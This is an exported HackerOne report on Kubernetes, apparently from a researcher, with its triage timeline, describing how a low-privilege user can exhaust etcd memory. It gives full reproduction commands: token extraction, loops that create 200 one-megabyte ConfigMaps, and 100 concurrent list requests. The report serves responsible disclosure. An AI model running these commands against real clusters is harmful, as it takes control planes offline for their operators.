Notes:
- The report was not accepted. I intend to file a public issue, but haven't yet.
- Kubernetes asks for reports to be submitted through https://hackerone.com. That's where I submitted the report. This is an export of the report
Title: Concurrent list requests of many, large Kubernetes resources cause etcd members to exhaust almost all available memory Scope: https://github.com/kubernetes/kubernetes Weakness: Denial of Service Severity: Medium (6.5) Link: /reports/1058775 Date: 2020-12-14 21:20:50 +0000 By: @dlipovetsky CVE IDs:
Details:
In a Kubernetes cluster deployed with the default configuration, a user that can create and list large (e.g. 1MB) resources (e.g. ConfigMaps) can cause one or more etcd members to exhaust almost all available memory of the host, causing one or more control plane replicas to become unavailable. Although the kernel OOM-kills multiple processes, including etcd, in my experiments, affected control plane replicas needed to be restarted to become available.
Moreover, any client (e.g. a controller) that watches said resources may exhaust its available (e.g. restricted by a quota) memory when synchronizing its cache.
As the available memory of each control plane replica increases, so does the number of resources that must be created, and the number of concurrent list queries required to make reproduce this vulnerability. For 3 control plane replicas, each with 16GB system memory, 200 1MB ConfigMaps, and 100 concurrent list requests should be sufficient. I have not yet looked for an upper bound of either the number of resources or concurrent list requests.
In v1.20, API Priority and Fairness is enabled by default. It has had no effect on my experiments; although some of the concurrent list requests are throttled, etcd still exhausts available memory. To be fair, I have not changed the default configuration.
I have also replicated these experiments with Secrets (which, unlike ConfigMaps, can be larger than 1MB). Other resources may also work.
v1.20.0 v1.19.x v1.18.x
etcd v3.4.13 etcd v3.4.3
-
Deploy a Kubernetes cluster with the default configuration. I used kubeadm on an Ubuntu 20.04 VM.
-
Create role and rolebinding for system:serviceaccount:default:default
USER="system:serviceaccount:default:default"
kubectl create role configmap-readwriter --verb=create,list --resource=configmap
kubectl create rolebinding default-configmap-readwriter --user "$USER" --role configmap-readwriter
- Create kubeconfig context for "system:serviceaccount:default:default" and cluster "kubernetes"
Note: You may need to change the
CLUSTERNAME
value.
CLUSTERNAME=kubernetes
TOKENNAME="$(kubectl get serviceaccount/default -o jsonpath='{.secrets[0].name}')"
TOKEN="$(kubectl get secret $TOKENNAME -o=jsonpath='{.data.token}' | base64 --decode)"
kubectl config set-credentials default-sa --token="$TOKEN"
kubectl config set-context default-sa --user=default-sa --cluster="$CLUSTERNAME"
- (Optional) Verify the limited privileges
kubectl config use-context default-sa
kubectl auth can-i --list
-
(Optional) Observe the available memory on one or more control plane replicas For example, use
watch "free -h"
. -
Using the context from Step 2, create 200 ConfigMaps, 1MB each, in the default namespace
kubectl config use-context default-sa cat > cm.yaml<<EOF apiVersion: v1 kind: ConfigMap metadata: generateName: payload- data: payload: $(base64 --wrap=0 /dev/urandom | head -c 1024768) EOF for i in {1..200}; do kubectl create -f cm.yaml; done
-
Using the context from Step 2, list all ConfigMaps in the default namespace, 100 times, concurrently
kubectl config use-context default-sa
for i in {1..100}; do kubectl get configmaps & done
Exhausting available memory while responding to list queries seems to be a known issue for etcd: etcd-io/etcd#12457 (comment). There is a proposal to add a QoS mechanism to protect etcd from its clients.
An attack could make the cluster control plane unavailable. It could also cause other API clients (e.g. controllers) to exhaust their available memory.
Timeline: 2020-12-14 21:23:37 +0000: @dlipovetsky (comment) This is my first time estimating CVE severity. My coworkers reviewed my report, and had no objections, but I take responsibility, and apologize, if the severity is incorrect.
2020-12-15 11:35:06 +0000: @turtle_shell (bug triaged) Hello @dlipovetsky,
Thank you for your submission! We were able to validate your report, and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change.
Regards, @turtle_shell
2020-12-15 11:41:34 +0000: @turtle_shell (report severity updated)
2020-12-15 16:58:24 +0000: @dlipovetsky (comment) Thanks for triaging this, and the update, @turtle_shell.
I realize that this issue might be seen as a failure to "tuning the control plane for the appropriate scale," but I suspect that the attack works at any scale, though I admit I have not tested this exhaustively.
2020-12-16 17:30:31 +0000: @dlipovetsky (comment)
There is a proposal to add a QoS mechanism to protect etcd from its clients. I misunderstood this proposal. It's more about fairness, and I don't think it will address the issue I'm reporting.
2020-12-18 22:40:25 +0000: @tallclair (bug informative) I've reviewed this issue with several of the kubernetes API machinery leads, and we've concluded that this is largely working as intended. Existing mitigations include:
- we don't allow anonymous users to do this
- resourcequota can be used to limit how many configmaps can exist in a namespace
- the audit logs let you find which user is abusing you
- naughty, non-anonymous users can be handled out of band
- naughty, non-anonymous users that aren't constrained by quota can do all sorts of bad things to your cluster
Furthermore, there are known scalability issues with list requests, but those are being handled as scalability and performance bugs, not as security issues.
If you are not satisfied with these mitigations, I encourage you to file a public issue or raise the concerns with SIG API Machinery
2020-12-18 22:40:51 +0000: @tallclair (agreed on going public)
2020-12-19 00:08:46 +0000: @dlipovetsky (comment) Thanks for reviewing, and the feedback, @tallclair.
I'll take some time to see whether I can reproduce this taking namespace resource quotas into account.